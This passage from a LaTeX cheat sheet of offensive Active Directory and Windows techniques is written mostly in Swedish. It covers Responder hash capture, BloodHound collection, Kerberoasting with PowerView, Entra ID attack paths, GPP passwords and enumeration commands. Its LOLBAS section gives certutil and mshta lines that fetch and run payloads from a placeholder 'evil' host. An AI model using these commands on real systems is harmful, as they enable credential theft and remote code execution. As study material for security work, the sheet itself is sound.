NTLM-hash. Pretends to be the correct service. Requires {\bf{root}}. Catches \seqsplit{Challenge-response-hashses} from NTLM-auth.}}} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Challenge-response, inte en pwd-hash. NTLM != NetNTLMv1/v2}}} \tn % Row Count 6 (+ 2) % Row 2 \SetRowColor{LightBackground} {\bf{responder -I eth0}} & Start \tn % Row Count 8 (+ 2) % Row 3 \SetRowColor{white} NetNTLMv1 & Äldre, svagare challenge response -{}-\textgreater{} 5500 - hashcat \tn % Row Count 11 (+ 3) % Row 4 \SetRowColor{LightBackground} NetNTLMv2 & Nyare, starkare - vanligt i moderna Windows -{}-\textgreater{} 5600 hashcat \tn % Row Count 14 (+ 3) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\seqsplit{username::DOMAIN:challenge:response:blob}} \tn % Row Count 15 (+ 1) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\seqsplit{USERNAME::DOMAIN:1122334455667788:0123456789ABCDEF0123456789ABCDEF:0102030405060708090A0B0C0D0E0F10}} \tn % Row Count 17 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Hasharna anv{\"a}nds fr{\"a}ms f{\"o}r att kn{\"a}ckas, inte som tex PtH} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Bloodhound/Sharphound}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Kartl{\"a}gger beh{\"o}righetsv{\"a}gar i Active Directory. Hj{\"a}lper till att hitta privilege escalation-paths. Sharphound(CLI) samlar in AD-data. L{\"a}ser in i Bloodhound(GUI)}}} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} {\bf{Invoke-BloodHound -CollectionMethod All}} & Powershellversionen av Sharphound. K{\"o}rs i minnet. Resultat: Zip som l{\"a}ses in i BH \tn % Row Count 9 (+ 5) % Row 2 \SetRowColor{LightBackground} {\bf{SharpHound.exe -c All}} & Bin{\"a}r. Anv{\"a}nds om PS {\"a}r blockat. Resultat: Zip som l{\"a}ses in i BH \tn % Row Count 13 (+ 4) % Row 3 \SetRowColor{white} {\bf{Invoke-BloodHound -Domain LAB.local -Username hacker -Password hemligt123}} & Specificera dom{\"a}n \tn % Row Count 17 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{p{0.8 cm} p{0.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cain}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Sniffar, fångar och kn{\"a}cker l{\"o}senord och hashar i ett lokalt n{\"a}tverk. Kr{\"a}ver administrat{\"o}r. GUI-verktyg. Fr{\"a}mst Windows fokus}}} \tn % Row Count 3 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.36 cm} x{4.64 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Azure \& Entra ID}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{Struktur }}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Tenants & Isolerad instans av EntraID \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} Users & Interna och externa \tn % Row Count 4 (+ 1) % Row 3 \SetRowColor{white} Roles & RBAC f{\"o}r att styra vad anv{\"a}ndaren kan g{\"o}ra \tn % Row Count 6 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{Roller}}} \tn % Row Count 7 (+ 1) % Row 5 \SetRowColor{white} Global Administrator & Full kontroll {\"o}ver allt \tn % Row Count 9 (+ 2) % Row 6 \SetRowColor{LightBackground} Privileged Role Administrator & Hanterar roller. Kan ge sig sj{\"a}lv Global Admin \tn % Row Count 12 (+ 3) % Row 7 \SetRowColor{white} Application Developer & Registrera appar och ge dom API-access \tn % Row Count 14 (+ 2) % Row 8 \SetRowColor{LightBackground} Security Reader & Kan l{\"a}sa s{\"a}k.konf, men ej {\"a}ndra \tn % Row Count 16 (+ 2) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{Misc}}} \tn % Row Count 17 (+ 1) % Row 10 \SetRowColor{LightBackground} Service Principal & Kopplar app till EntraID dvs g{\"o}r appen k{\"o}rbar \tn % Row Count 20 (+ 3) % Row 11 \SetRowColor{white} App Registration & App som skapats av tenant. Innehåller konfig, beh{\"o}righeter och secrets \tn % Row Count 24 (+ 4) % Row 12 \SetRowColor{LightBackground} Enterprise Application & Faktiska instansen (Service Principal) av en app i en tenant \tn % Row Count 27 (+ 3) % Row 13 \SetRowColor{white} Conditional Access & Styra n{\"a}r, var och hur anv{\"a}ndare får åtkomst till resurser – baserat på olika villkor -{}-\textgreater{} MFA \tn % Row Count 32 (+ 5) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{3.36 cm} x{4.64 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Azure \& Entra ID (cont)}} \tn % Row 14 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{Attack}}} \tn % Row Count 1 (+ 1) % Row 15 \SetRowColor{white} Shadow admin & App kan få admin-r{\"a}ttigheter i smyg, via API-beh{\"o}righeter \tn % Row Count 4 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4.8 cm} x{3.2 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{\seqsplit{PowerSploit/PowerView/Empire}}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{PowerSploit}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Samling offensiva Powershell-script. Anv{\"a}nds ofta från RAM. Innehåller PowerView, PowerUp etc}}} \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{PowerSploit.psd1}}} \tn % Row Count 4 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{PowerView}}} \tn % Row Count 5 (+ 1) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Recon-delen i PowerSploit (AD-enumerering). L{\"a}ses in direkt i minnet (iex)}}} \tn % Row Count 7 (+ 2) % Row 5 \SetRowColor{white} {\bf{Import-Module PowerView.ps1`}} & Starta modul \tn % Row Count 9 (+ 2) % Row 6 \SetRowColor{LightBackground} {\bf{Invoke-Kerberoast}} & Dra ut TGS f{\"o}r crack \tn % Row Count 11 (+ 2) % Row 7 \SetRowColor{white} {\bf{Get-DomainUser -SPN}} & Information om DC \tn % Row Count 13 (+ 2) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{Empire}}} \tn % Row Count 14 (+ 1) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Post-exploit-ramverk (C2) med f{\"a}rdiga moduler ex. PowerView. Liknar Metasploit i syntaxen}}} \tn % Row Count 16 (+ 2) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{CLI-kommandon (listeners, usestager, agents} \tn % Row Count 17 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.52 cm} x{4.48 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{AD}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Group Policy Objects (GPOs) anv{\"a}nds f{\"o}r att centralt styra konfigurationer på anv{\"a}ndare och datorer i en Active Directory-dom{\"a}n. EJ EntraID}}} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} Group Policy–managed passwords & Finns i Groups.xml på SYSVOL. Kr{\"a}ver endast giltigt domain user account f{\"o}r att l{\"a}sa filen. AES-kryptering. \tn % Row Count 9 (+ 6) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Group Policy Store}}} \tn % Row Count 10 (+ 1) % Row 3 \SetRowColor{white} SYSVOL & Filbaserad. Skript, inst{\"a}llningsfiler, templates \tn % Row Count 13 (+ 3) % Row 4 \SetRowColor{LightBackground} AD & Katalogbaserad. Metadata: namn, l{\"a}nkar, versionsnummer \tn % Row Count 16 (+ 3) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{ATTACKER}}} \tn % Row Count 17 (+ 1) % Row 6 \SetRowColor{LightBackground} Golden SAML & Certifikatskapning m{\"o}jligg{\"o}r falsk autentisering \tn % Row Count 20 (+ 3) % Row 7 \SetRowColor{white} Token replays & Missbruk av tokens (OpenID \& v OAuth 2.0) \tn % Row Count 22 (+ 2) % Row 8 \SetRowColor{LightBackground} AAD Connect & Synkar konton från AD till Entra ID. Om servern komprometteras -\textgreater{} Dumpa NT-hashar \tn % Row Count 26 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4.96 cm} x{3.04 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{LOLBAS}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Ladda ned payloads, k{\"o}ra kod dolt, persistence}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} {\bf{certutil -urlcache -f http://evil/payload.exe payload.exe}} & Handling certificates \tn % Row Count 4 (+ 3) % Row 2 \SetRowColor{LightBackground} {\bf{mshta http://evil/malicious.hta}} & Execute html applications \tn % Row Count 6 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{p{0.8 cm} p{0.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{MISC}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Misc}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{Lista portar}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} netstat -antp | grep LISTEN & Lists open ports/connections \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \seqsplit{Get-NetTCPConnection} -State Listen & Lists open ports/connections (powershell) \tn % Row Count 6 (+ 3) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ Lista grupper }}} \tn % Row Count 7 (+ 1) % Row 4 \SetRowColor{LightBackground} net localgroup "Administatror" & Lista administrator \tn % Row Count 9 (+ 2) % Row 5 \SetRowColor{white} \seqsplit{Get-LocalGroupMember} -Name "Administrator" & Lista administrator \tn % Row Count 12 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ Lista firewall states }}} \tn % Row Count 13 (+ 1) % Row 7 \SetRowColor{white} \seqsplit{Get-NetFirewallProfile} | Select Name,Enabled & Lista firewall states \tn % Row Count 16 (+ 3) % Row 8 \SetRowColor{LightBackground} netsh advfirewall show allprofiles & Lista firewall states \tn % Row Count 18 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{1.44 cm} x{6.56 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Common ports}} \tn % Row 0 \SetRowColor{LightBackground} 21 & FTP \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} 22 & SSH \& SFTP \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} 23 & Telnet \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} 69 & TFTP \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} 88 & (TCP och UDP): Kerberos Key Distribution Center (KDC) \tn % Row Count 6 (+ 2) % Row 5 \SetRowColor{white} 445 & SMB \tn % Row Count 7 (+ 1) % Row 6 \SetRowColor{LightBackground} 2049 & NFS \tn % Row Count 8 (+ 1) % Row 7 \SetRowColor{white} 3389 & RDP \tn % Row Count 9 (+ 1) % Row 8 \SetRowColor{LightBackground} \seqsplit{5985/5986} & WinRM (http/https) \tn % Row Count 11 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}